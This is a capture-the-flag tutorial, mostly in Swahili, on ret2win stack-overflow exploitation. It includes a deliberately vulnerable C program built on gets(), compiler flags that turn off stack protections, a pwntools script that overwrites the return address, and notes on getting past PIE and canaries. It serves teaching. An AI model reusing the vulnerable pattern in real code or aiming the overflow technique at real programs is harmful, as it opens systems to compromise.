Ret2win

Reading time: 6 minutes

Basic Information

Ret2win changamoto ni aina maarufu katika mashindano ya Capture The Flag (CTF), hasa katika kazi zinazohusisha binary exploitation. Lengo ni kutumia udhaifu katika binary iliyotolewa ili kutekeleza kazi maalum, isiyokuwa na mwito ndani ya binary, mara nyingi ikijulikana kama win, flag, n.k. Kazi hii, inapotekelezwa, kawaida huprinti bendera au ujumbe wa mafanikio. Changamoto hiyo kwa kawaida inahusisha kuandika upya anwani ya kurudi kwenye stack ili kuelekeza mtiririko wa utekelezaji kwenye kazi inayotakiwa. Hapa kuna maelezo ya kina zaidi na mifano:

C Example

Consider a simple C program with a vulnerability and a win function that we intend to call:

#include <stdio.h>
#include <string.h>

void win() {
printf("Congratulations! You've called the win function.\n");
}

void vulnerable_function() {
char buf[64];
gets(buf); // This function is dangerous because it does not check the size of the input, leading to buffer overflow.
}

int main() {
vulnerable_function();
return 0;
}

Ili kukusanya programu hii bila ulinzi wa stack na ASLR imezimwa, unaweza kutumia amri ifuatayo:

gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c

• -m32: Jenga programu kama binary ya 32-bit (hii ni hiari lakini ni ya kawaida katika changamoto za CTF).
• -fno-stack-protector: Zima ulinzi dhidi ya stack overflows.
• -z execstack: Ruhusu utekelezaji wa msimbo kwenye stack.
• -no-pie: Zima Position Independent Executable ili kuhakikisha kwamba anwani ya kazi ya win haibadiliki.
• -o vulnerable: Patia faili ya matokeo jina vulnerable.

Python Exploit using Pwntools

Kwa exploit, tutatumia pwntools, mfumo wenye nguvu wa CTF wa kuandika exploits. Skripti ya exploit itaunda payload ili kujaa buffer na kuandika anwani ya kurudi kwa anwani ya kazi ya win.

from pwn import *

# Set up the process and context for the binary
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path

# Find the address of the win function
win_addr = p32(0x08048456)  # Replace 0x08048456 with the actual address of the win function in your binary

# Create the payload
# The buffer size is 64 bytes, and the saved EBP is 4 bytes. Hence, we need 68 bytes before we overwrite the return address.
payload = b'A' * 68 + win_addr

# Send the payload
p.sendline(payload)
p.interactive()

Ili kupata anwani ya kazi ya win, unaweza kutumia gdb, objdump, au chombo kingine chochote kinachokuruhusu kukagua faili za binary. Kwa mfano, kwa kutumia objdump, unaweza kutumia:

objdump -d vulnerable | grep win

Amri hii itaonyesha muundo wa win function, ikiwa ni pamoja na anwani yake ya kuanzia.

Python script inatuma ujumbe ulioandaliwa kwa uangalifu ambao, unaposhughulikiwa na vulnerable_function, unavunja buffer na kuandika tena anwani ya kurudi kwenye stack kwa anwani ya win. Wakati vulnerable_function inarudi, badala ya kurudi kwa main au kutoka, inaruka hadi win, na ujumbe unachapishwa.

Ulinzi

• PIE inapaswa kuzuiliwa ili anwani iwe ya kuaminika katika utekelezaji tofauti au anwani ambapo kazi itahifadhiwa haitakuwa kila wakati sawa na unahitaji uvujaji fulani ili kubaini wapi kazi ya win imepakiwa. Katika baadhi ya matukio, wakati kazi inayosababisha overflow ni read au sawa, unaweza kufanya Partial Overwrite ya byte 1 au 2 kubadilisha anwani ya kurudi kuwa kazi ya win. Kwa sababu ya jinsi ASLR inavyofanya kazi, nibble tatu za mwisho za hex hazijachanganywa, hivyo kuna 1/16 nafasi (1 nibble) ya kupata anwani sahihi ya kurudi.
• Stack Canaries pia zinapaswa kuzuiliwa au anwani ya kurudi ya EIP iliyovunjika haitafuatiwa kamwe.

Mifano Mingine & Marejeleo

• https://ir0nstone.gitbook.io/notes/types/stack/ret2win
• https://guyinatuxedo.github.io/04-bof_variable/tamu19_pwn1/index.html
• 32bit, hakuna ASLR
• https://guyinatuxedo.github.io/05-bof_callfunction/csaw16_warmup/index.html
• 64 bits zikiwa na ASLR, na uvujaji wa anwani ya bin
• https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html
• 64 bits, hakuna ASLR
• https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html
• 32 bits, hakuna ASLR, overflow ndogo mara mbili, ya kwanza kujaa stack na kuongeza ukubwa wa overflow ya pili
• https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
• 32 bit, relro, hakuna canary, nx, hakuna pie, format string kubadilisha anwani ya fflush na kazi ya win (ret2win)
• https://guyinatuxedo.github.io/15-partial_overwrite/tamu19_pwn2/index.html
• 32 bit, nx, hakuna kingine, partial overwrite ya EIP (1Byte) kuita kazi ya win
• https://guyinatuxedo.github.io/15-partial_overwrite/tuctf17_vulnchat2/index.html
• 32 bit, nx, hakuna kingine, partial overwrite ya EIP (1Byte) kuita kazi ya win
• https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html
• Programu inathibitisha tu byte ya mwisho ya nambari ili kuangalia ukubwa wa ingizo, kwa hivyo inawezekana kuongeza ukubwa wowote mradi byte ya mwisho iko ndani ya upeo unaoruhusiwa. Kisha, ingizo linaunda overflow ya buffer inayotumiwa na ret2win.
• https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/
• 64 bit, relro, hakuna canary, nx, pie. Partial overwrite kuita kazi ya win (ret2win)
• https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/
• arm64, PIE, inatoa uvujaji wa PIE kazi ya win kwa kweli ni kazi 2 hivyo ROP gadget inayopiga kazi 2
• https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/
• ARM64, off-by-one kuita kazi ya win

Mfano wa ARM64

{{#ref}} ret2win-arm64.md {{#endref}}